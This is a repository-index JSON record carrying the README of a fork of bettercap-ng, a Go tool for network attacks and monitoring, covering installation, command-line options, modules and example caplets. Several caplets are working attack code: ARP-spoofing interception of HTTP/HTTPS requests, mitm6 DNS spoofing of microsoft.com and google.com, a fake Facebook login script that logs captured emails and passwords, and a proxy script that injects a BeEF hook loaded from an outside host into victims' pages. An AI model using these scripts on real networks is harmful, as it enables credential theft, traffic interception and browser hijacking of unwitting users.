{"id":15323693,"url":"https://github.com/mvrilo/bettercap","last_synced_at":"2025-10-09T10:31:25.582Z","repository":{"id":57607566,"uuid":"119858876","full_name":"mvrilo/bettercap","owner":"mvrilo","description":"bettercap-ng is a complete reimplementation of bettercap, the Swiss army knife for network attacks and monitoring. It is faster, stabler, smaller, easier to install and to use.","archived":false,"fork":true,"pushed_at":"2018-03-22T05:00:39.000Z","size":5134,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-26T19:02:13.573Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://www.bettercap.org/","language":"Go","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"bettercap/bettercap","license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mvrilo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-02-01T16:02:13.000Z","updated_at":"2018-03-20T19:37:17.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/mvrilo/bettercap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/mvrilo/bettercap","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mvrilo%2Fbettercap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mvrilo%2Fbettercap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mvrilo%2Fbettercap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mvrilo%2Fbettercap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mvrilo","download_url":"https://codeload.github.com/mvrilo/bettercap/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mvrilo%2Fbettercap/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279001275,"owners_count":26083040,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-09T02:00:07.460Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-01T09:21:05.063Z","updated_at":"2025-10-09T10:31:24.945Z","avatar_url":"https://github.com/mvrilo.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg alt=\"BetterCap\" src=\"https://www.bettercap.org/assets/logo.png\" height=\"140\" /\u003e\n  \u003cp align=\"center\"\u003e\n    \u003ca href=\"https://github.com/evilsocket/bettercap-ng/releases/latest\"\u003e\u003cimg alt=\"Release\" src=\"https://img.shields.io/github/release/evilsocket/bettercap-ng.svg?style=flat-square\"\u003e\u003c/a\u003e\n    \u003ca href=\"/LICENSE\"\u003e\u003cimg alt=\"Software License\" src=\"https://img.shields.io/badge/license-GPL3-brightgreen.svg?style=flat-square\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://travis-ci.org/evilsocket/bettercap-ng\"\u003e\u003cimg alt=\"Travis\" src=\"https://img.shields.io/travis/evilsocket/bettercap-ng/master.svg?style=flat-square\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://goreportcard.com/report/github.com/evilsocket/bettercap-ng\"\u003e\u003cimg alt=\"Go Report Card\" src=\"https://goreportcard.com/badge/github.com/evilsocket/bettercap-ng?style=flat-square\u0026fuckgithubcache=1\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://www.codacy.com/app/evilsocket/bettercap-ng\"\u003e\u003cimg alt=\"Codacy Badge\" src=\"https://api.codacy.com/project/badge/Grade/21b1818122d54bc29c3f6327f2067fd4\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/p\u003e\n\n**bettercap-ng** is a complete reimplementation of bettercap, the Swiss army knife for network attacks and monitoring. It is faster, stabler, smaller, easier to install and to use.\n\n## Using it with Docker\n\nIn this repository, BetterCAP is containerized using [Alpine Linux](https://alpinelinux.org/ \"\") -  a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies.\n\nTo pull latest BetterCAP version of the image:\n\n    $ docker pull evilsocket/bettercap-ng\n\nTo run:\n\n    $ docker run -it --privileged --net=host evilsocket/bettercap-ng -h\n\n## Compilation\n\nMake sure you have a correctly configured Go \u003e= 1.8 environment, that `$GOPATH/bin` is in `$PATH` and the `libpcap-dev` package installed for your system, then:\n\n    $ go get github.com/evilsocket/bettercap-ng\n\nTo show the command line options:\n\n    $ sudo bettercap-ng -h\n    \n    Usage of ./bettercap-ng:\n      -caplet string\n            Read commands from this file and execute them in the interactive session.\n      -debug\n            Print debug messages.\n      -eval string\n            Run a command, used to set variables via command line.\n      -iface string\n            Network interface to bind to.\n      -no-history\n            Disable history file.\n      -silent\n            Suppress all logs which are not errors.\n\n## Cross Compilation\n\nAs an example, let's cross compile bettercap for ARM (requires `gcc-arm-linux-gnueabi`, `byacc` and `flex` packages).\n\n**Step 1**: download and cross compile libpcap-1.8.1 for ARM (adjust `PCAPV` to use a different libpcap version):\n\n    cd /tmp\n    export PCAPV=1.8.1\n    wget http://www.tcpdump.org/release/libpcap-$PCAPV.tar.gz\n    tar xvf libpcap-$PCAPV.tar.gz\n    cd libpcap-$PCAPV\n    export CC=arm-linux-gnueabi-gcc\n    ./configure --host=arm-linux --with-pcap=linux\n    make\n\n**Step 2**: now cross compile bettercap-ng itself:\n\n    cd $GOPATH/src/github.com/evilsocket/bettercap-ng\n    env CC=arm-linux-gnueabi-gcc CGO_ENABLED=1 GOOS=linux GOARCH=arm CGO_LDFLAGS=\"-L/tmp/libpcap-$PCAPV\" make\n\n**Done**\n\n## Command Line Options\n\nBy issuing `bettercap-ng -h` the main command line options will be shown:\n\n    Usage of ./bettercap-ng:\n      -caplet string\n            Read commands from this file and execute them in the interactive session.\n      -debug\n            Print debug messages.\n      -eval string\n            Run one or more commands separated by ; in the interactive session, used to set variables via command line.\n      -iface string\n            Network interface to bind to, if empty the default interface will be auto selected.\n      -no-history\n            Disable interactive session history file.\n      -silent\n            Suppress all logs which are not errors.\n\nIf no `-caplet` option is specified, bettercap-ng will start in interactive mode.\n\n## Interactive Mode\n\nBy default, bettercap-ng will start in interactive mode, allowing you to start and stop modules manually, change options and apply new firewall rules on the fly, to show the help menu type `help`:\n\n    MAIN COMMANDS\n    \n                  help MODULE : List available commands or show module specific help if no module name is provided.\n                       active : Show information about active modules.\n                         quit : Close the session and exit.\n                sleep SECONDS : Sleep for the given amount of seconds.\n                     get NAME : Get the value of variable NAME, use * for all.\n               set NAME VALUE : Set the VALUE of variable NAME.\n                        clear : Clear the screen.\n               include CAPLET : Load and run this caplet in the current session.\n                    ! COMMAND : Execute a shell command and print its output.\n               alias MAC NAME : Assign an alias to a given endpoint given its MAC address.\n\n    MODULES\n                     api.rest \u003e not running\n                    arp.spoof \u003e not running\n                  dhcp6.spoof \u003e not running\n                    dns.spoof \u003e not running\n                events.stream \u003e running\n                   http.proxy \u003e not running\n                  http.server \u003e not running\n                  https.proxy \u003e not running\n                  mac.changer \u003e not running\n                    net.probe \u003e not running\n                    net.recon \u003e running\n                    net.sniff \u003e not running\n                       ticker \u003e not running\n                          wol \u003e not running\n\nYou can have module specific help by using `help module-name` (for instance try with `help net.recon`), to print all variables you can use `get *`.\n\n## Caplets\n\nInteractive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.\n\n#### caplets/http-req-dump.cap\n\nExecute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dump.js` proxy script.\n\n```sh\n# targeting the whole subnet by default, to make it selective:\n#\n#   sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval \"set arp.spoof.targets 192.168.1.64\"\n\n# to make it less verbose\n# events.stream off\n\n# discover a few hosts \nnet.probe on\nsleep 1\nnet.probe off\n\n# uncomment to enable sniffing too\n# set net.sniff.verbose false\n# set net.sniff.local true\n# set net.sniff.filter tcp port 443\n# net.sniff on\n\n# we'll use this proxy script to dump requests\nset https.proxy.script caplets/http-req-dump.js\nset http.proxy.script caplets/http-req-dump.js\nclear\n\n# go ^_^\nhttp.proxy on\nhttps.proxy on\narp.spoof on\n```\n\n#### caplets/netmon.cap\n\nAn example of how to use the `ticker` module, use this caplet to monitor activities on your network.\n\n```sh\nnet.probe on\nclear\nticker on\n```\n\n#### caplets/mitm6.cap\n\n[Reroute IPv4 DNS requests by using DHCPv6 replies](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/), start a HTTP server and DNS spoofer for `microsoft.com` and `google.com`.\n\n```sh\n# let's spoof Microsoft and Google ^_^\nset dns.spoof.domains microsoft.com, google.com\nset dhcp6.spoof.domains microsoft.com, google.com\n\n# every request http request to the spoofed hosts will come to us\n# let's give em some contents\nset http.server.path caplets/www\n\n# serve files\nhttp.server on\n# redirect DNS request by spoofing DHCPv6 packets\ndhcp6.spoof on\n# send spoofed DNS replies ^_^\ndns.spoof on\n\n# set a custom prompt for ipv6\nset $ {by}{fw}{cidr} {fb}\u003e {env.iface.ipv6} {reset} {bold}» {reset}\n# clear the events buffer and the screen\nevents.clear\nclear\n```\n\n\u003ccenter\u003e\n    \u003cimg src=\"https://pbs.twimg.com/media/DTXrMJJXcAE-NcQ.jpg:large\" width=\"100%\"/\u003e\n\u003c/center\u003e\n\n#### caplets/rest-api.cap\n\nStart a rest API.\n\n```sh\n# change these!\nset api.rest.username bcap\nset api.rest.password bcap\n# set api.rest.port 8082\n\n# actively probe network for new hosts\nnet.probe on\n\n# enjoy /api/session and /api/events\napi.rest on\n```\n\nGet information about the current session:\n\n    curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session\n\nExecute a command in the current interactive session:\n\n    curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H \"Content-Type: application/json\" -X POST -d '{\"cmd\":\"net.probe on\"}'\n\nGet last 50 events:\n\n    curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50\n\nClear events:\n\n    curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events\n\n\u003ccenter\u003e\n    \u003cimg src=\"https://pbs.twimg.com/media/DTAreSCX4AAXX6v.jpg:large\" width=\"100%\"/\u003e\n\u003c/center\u003e\n\n#### caplets/fb-phish.cap\n\nThis caplet will create a fake Facebook login page on port 80, intercept login attempts using the `http.proxy`, print credentials and redirect the target to the real Facebook.\n\n\u003ccenter\u003e\n    \u003cimg src=\"https://pbs.twimg.com/media/DTY39bnXcAAg5jX.jpg:large\" width=\"100%\"/\u003e\n\u003c/center\u003e\n\nMake sure to create the folder first:\n\n    $ cd caplets/www/\n    $ make\n\n```sh\nset http.server.address 0.0.0.0\nset http.server.path caplets/www/www.facebook.com/\n\nset http.proxy.script caplets/fb-phish.js\n\nhttp.proxy on\nhttp.server on\n```\n\nThe `caplets/fb-phish.js` proxy script file:\n\n```javascript\nfunction onRequest(req, res) {\n    if( req.Method == \"POST\" \u0026\u0026 req.Path == \"/login.php\" \u0026\u0026 req.ContentType == \"application/x-www-form-urlencoded\" ) {\n        var form = req.ParseForm();\n        var email = form[\"email\"] || \"?\", \n            pass  = form[\"pass\"] || \"?\";\n\n        log( R(req.Client), \" \u003e FACEBOOK \u003e email:\", B(email), \" pass:'\" + B(pass) + \"'\" );\n\n        res.Status      = 301;\n        res.Headers     = \"Location: https://www.facebook.com/\\n\" +\n                          \"Connection: close\";\n        res.Updated()\n    }\n}\n```\n\n#### caplets/beef-inject.cap\n\nUse a proxy script to inject a BEEF javascript hook:\n\n```sh\n# targeting the whole subnet by default, to make it selective:\n#\n#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval \"set arp.spoof.targets 192.168.1.64\"\n\n# inject beef hook\nset http.proxy.script caplets/beef-inject.js\n# redirect http traffic to a proxy\nhttp.proxy on\n# wait for everything to start properly\nsleep 1\n# make sure probing is off as it conflicts with arp spoofing\narp.spoof on\n```\n\nThe `caplets/beef.inject.js` proxy script file:\n\n```javascript\nfunction onLoad() {\n    console.log( \"BeefInject loaded.\" );\n    console.log(\"targets: \" + env['arp.spoof.targets']);\n}\n\nfunction onResponse(req, res) {\n    if( res.ContentType.indexOf('text/html') == 0 ){\n        var body = res.ReadBody();\n        if( body.indexOf('\u003c/head\u003e') != -1 ) {\n            res.Body = body.replace( \n                '\u003c/head\u003e', \n                '\u003cscript type=\"text/javascript\" src=\"http://your-beef-box:3000/hook.js\"\u003e\u003c/script\u003e\u003c/head\u003e' \n            ); \n            res.Updated();\n        }\n    }\n}\n```\n\n## License\n\n`bettercap` and `bettercap-ng` are made with ♥  by [Simone Margaritelli](https://www.evilsocket.net/) and they're released under the GPL 3 license.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmvrilo%2Fbettercap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmvrilo%2Fbettercap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmvrilo%2Fbettercap/lists"}